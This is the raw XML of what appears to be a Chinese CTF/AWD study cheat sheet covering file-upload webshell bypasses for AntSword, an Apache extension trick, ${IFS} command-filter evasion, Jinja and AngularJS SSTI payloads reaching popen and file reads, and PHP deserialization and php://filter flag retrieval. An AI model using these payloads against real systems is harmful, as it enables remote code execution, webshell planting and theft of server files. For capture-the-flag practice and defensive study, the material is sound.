          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="C7254E"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="F9F2F4"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>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76"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5264785" cy="342265"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc459"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>五.文件上传</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p>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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>&lt;?绕过一句话木马(蚁剑连接密码为shell)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1031" o:spt="75" type="#_x0000_t75" style="height:31.8pt;width:32.15pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId78" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1031" DrawAspect="Content" ObjectID="_1468075731" r:id="rId77">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:object>
      </w:r>
    </w:p>
    <w:p>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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1032" o:spt="75" type="#_x0000_t75" style="height:31.8pt;width:37.15pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId80" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1032" DrawAspect="Content" ObjectID="_1468075732" r:id="rId79">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:object>
      </w:r>
    </w:p>
    <w:p>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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1033" o:spt="75" type="#_x0000_t75" style="height:31.8pt;width:31.8pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId82" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1033" DrawAspect="Content" ObjectID="_1468075733" r:id="rId81">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:object>
      </w:r>
    </w:p>
    <w:p>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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>之后蚁剑连接url前缀a.php后，密码输入1即可</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5267960" cy="268224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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:num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apache解析漏洞绕过后缀名验证：上传文件时后缀名写成：php.xxx，这样在解析是apache不认识后缀xxx，就会当做前面的php利用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc12677"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>六.Linux指令</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p>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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>空格绕过： -&gt;${IFS}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc15367"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>七.SSTI(Python)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在AWD文档中，记载了一部分写法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__class__：返回类型所属对象</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获取基类的几种方法：</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''.__class__.__mro__[2]</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{}.__class__.__base__</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>request.__class__.__mro__[8] 　　</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">[].__class__.__bases__[0]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default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>三个常用payload：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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(下面的文件根据实际修改)</w:t>
      </w:r>
    </w:p>
    <w:p>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SSTI查找可利用类脚本(注意修改地址)：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1034" o:spt="75" type="#_x0000_t75" style="height:31.8pt;width:29.85pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId85" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1034" DrawAspect="Content" ObjectID="_1468075734" r:id="rId84">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:objec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配置文件settings.py利用：</w:t>
      </w:r>
    </w:p>
    <w:p>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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
    </w:p>
    <w:p>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86"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5259070" cy="56642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无下标读文件：</w:t>
      </w:r>
    </w:p>
    <w:p>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87"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5267960" cy="767715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>AngularJS的SSTI：如果存在{{1+1}}回显为2，传入(操作可以不是alert(1)根据实际修改)：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>&lt;class 'os._wrap_close'&gt;类利用：{{"".__class__.__bases__[0].__subclasses__()[os._wrap_close类下标].__init__.__globals__['popen']('cat /app/server.py').read()}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc24730"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>八.HTTP请求伪造</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p>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88"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5269865" cy="119761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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:r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89"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5266055" cy="1241425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc13066"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>九.PHP序列化</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>基本函数用法如下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>class test{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> public $varr1="abc";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> public $varr2="123";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> public function echoP(){</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  echo $this-&gt;varr1."&lt;br&gt;";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__construct(){</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  echo "__construct&lt;br&gt;";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__destruct(){</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  echo "__destruct&lt;br&gt;";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__toString(){</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  return "__toString&lt;br&gt;";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__sleep(){</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  echo "__sleep&lt;br&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  return array('varr1','varr2');</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public function __wakeup(){</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  echo "__wakeup&lt;br&gt;";</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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>$obj-&gt;echoP();   //调用echoP()方法，输出"abc"</w:t>
      </w:r>
    </w:p>
    <w:p>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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>?&gt;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输出</w:t>
      </w:r>
    </w:p>
    <w:p>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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>__toString(在对象当做字符串的时候会被调用。)</w:t>
      </w:r>
    </w:p>
    <w:p>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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>php://filter/read=convert.base64-encode/resource=flag.php</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查找flag文件：find / -name flag*</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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>最后要利用__toString实现页面内容输出</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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>#"a:2:{s:7:"phpflag";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}"</w:t>
      </w:r>
    </w:p>
    <w:p>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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
